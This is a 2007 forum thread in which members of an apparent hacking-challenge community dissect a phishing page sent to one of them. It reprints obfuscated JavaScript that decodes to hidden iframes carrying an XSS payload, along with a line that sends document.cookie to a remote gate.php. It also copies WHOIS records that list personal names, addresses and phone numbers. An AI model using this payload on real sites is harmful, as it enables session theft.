TheBlacksheep->Homepage->Other stuff->have fun disecting this

Topic: "have fun disecting this" (page 1 of 1)

1
Author Post
unknown user
have fun disecting this
some nobody registered an account, to send me a pm, and trick me in going to a webpage

the webpage itself was nothing more than some lame javascript exploit, i didn't even bother to disect it, have fun
<center>This site was removed.</center>

<script type="text/javascript">
function CA9EBC9067A1A3B4DA21ED549CC195(E6C54EFB7B7C634244312B243){
      function F645E88B3262503F555C823E7274(){
              return 16;
      }
      return(parseInt(E6C54EFB7B7C634244312B243,F645E88B3262503F555C823E7274()));
}

function F3EC4FA958E96D04C01772D(AE2DF00C9F45DE9BB19C82CD0FE07){
      var A10B295E47E54F6DB474AB13D46E268B="";
      for(F7E49DF95174BE5BD9817DF4298D5=0;
             F7E49DF95174BE5BD9817DF4298D5<AE2DF00C9F45DE9BB19C82CD0FE07.length;
             F7E49DF95174BE5BD9817DF4298D5+=2){

             A10B295E47E54F6DB474AB13D46E268B+=   
(String.fromCharCode(CA9EBC9067A1A3B4DA21ED549CC195(AE2DF00C9F45DE9BB19C82CD0FE07.substr(F7E49DF95174BE5BD9817DF4298D5,2))));
       }

       document.write(A10B295E47E54F6DB474AB13D46E268B);
}

F3EC4FA958E96D04C01772D("3C696672616D652077696474683D30206865696768743D30207374796C653D227669736962696C6974793A2068696464656E3B22207372633D22687474703A2F2F6272696768742D736861646F77732E6E65742F6368616C6C656E6765732F6578706C6F6974732F6578706C6F69745F6B616C6974727573742F646F6F722E7068703F62726F746865723D253030253232313233253230616E642532306B6579686F6C653D2532322533437363726970742532307372633D687474703A2F2F73777735342E636F6D2F312E68746D2533452533432F7363726970742533452532322F2A266B65793D313233267375626D69743D576973646F6D223E3C2F696672616D653E");
</script>

<script type="text/javascript">
function AF634F6EC0791551A92AE42FFC(DE9548D549DF7A63CBB6){
       function A55B5714950F036A6(){
                return 16;
       }

       return(parseInt(DE9548D549DF7A63CBB6,A55B5714950F036A6()));
}

function BCFF1D71254515531C46F86A3(E71A091436ECDC2774B80351EF481){
      var F72C6A26438F3FBE05BD176589="";

      for(C1A1F29017FDA9F0720920327BFCF1=0;
             C1A1F29017FDA9F0720920327BFCF1<E71A091436ECDC2774B80351EF481.length;
             C1A1F29017FDA9F0720920327BFCF1+=2){

             F72C6A26438F3FBE05BD176589+=
                     (String.fromCharCode(AF634F6EC0791551A92AE42FFC(E71A091436ECDC2774B80351EF481.substr(C1A1F29017FDA9F0720920327BFCF1,2))));
       }
      document.write(F72C6A26438F3FBE05BD176589);
}
BCFF1D71254515531C46F86A3("3C696672616D652077696474683D30206865696768743D30207374796C653D227669736962696C6974793A2068696464656E3B22207372633D22687474703A2F2F7777772E6272696768742D736861646F77732E6E65742F6368616C6C656E6765732F6578706C6F6974732F6578706C6F69745F6B616C6974727573742F646F6F722E7068703F62726F746865723D253030253232313233253230616E642532306B6579686F6C653D2532322533437363726970742532307372633D687474703A2F2F73777735342E636F6D2F312E68746D2533452533432F7363726970742533452532322F2A266B65793D313233267375626D69743D576973646F6D223E3C2F696672616D653E");
</script>


who knows perhaps it even exploits bright shadows...
the script never executed in my browser, anyway nice try.

edit: added some newlines
19.12.2007 09:41:45
EMail
quangntenemy
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
RE: have fun disecting this
WTF
<iframe width="0" height="0" src="http://bright-shadows.net/challenges/exploits/exploit_kalitrust/door.php?brother=%00%22123%20and%20keyhole=%22%3Cscript%20src=http://sww54.com/1.htm%3E%3C/script%3E%22/*&key=123&submit=Wisdom" style="visibility: hidden;">
<html>
<head/>
<body/>
</html>
</iframe>
<iframe width="0" height="0" src="http://www.bright-shadows.net/challenges/exploits/exploit_kalitrust/door.php?brother=%00%22123%20and%20keyhole=%22%3Cscript%20src=http://sww54.com/1.htm%3E%3C/script%3E%22/*&key=123&submit=Wisdom" style="visibility: hidden;">
<html>
<head/>
<body/>
</html>
</iframe>

Didn't know MYSQL itself was XSS vulnerable.
Don't think it will work inside iframe, but let's see if anyone got my cookie...
Vietnam19.12.2007 10:00:49
private message EMail Website
unknown user
RE: have fun disecting this
and this is where that pointed to

document.location='http://shad0w.onlinehoster.net/gate/gate.php?str='+document.cookie;
19.12.2007 10:03:39
EMail
unknown user
RE: have fun disecting this
this is the whois info of sww54.com

Registrant:
patitta pataya
90/5 Yingcha-roen village
HatYai, Songkhla 90110
Thailand

Registered through: Domains Priced Right
Domain Name: SWW54.COM
Created on: 26-Feb-07
Expires on: 26-Feb-08
Last Updated on:

Administrative Contact:
kaewkarn, veerasak vee_k@hotmail.com
NiceStyle.com
21/33 Lakmuang rd.,T.Naimuang
Muang, Surin 32000
Thailand
(081) 967-1924

Technical Contact:
kaewkarn, veerasak vee_k@hotmail.com
NiceStyle.com
21/33 Lakmuang rd.,T.Naimuang
Muang, Surin 32000
Thailand
(081) 967-1924

Domain servers in listed order:
DNS1.PREMIUMDNS.NET
DNS2.PREMIUMDNS.NET
19.12.2007 10:15:07
EMail
unknown user
RE: have fun disecting this
quang it's a viable exploit i would suggest you change your cookie ;)
19.12.2007 10:22:45
EMail

Topic: "have fun disecting this" (page 1 of 1)

1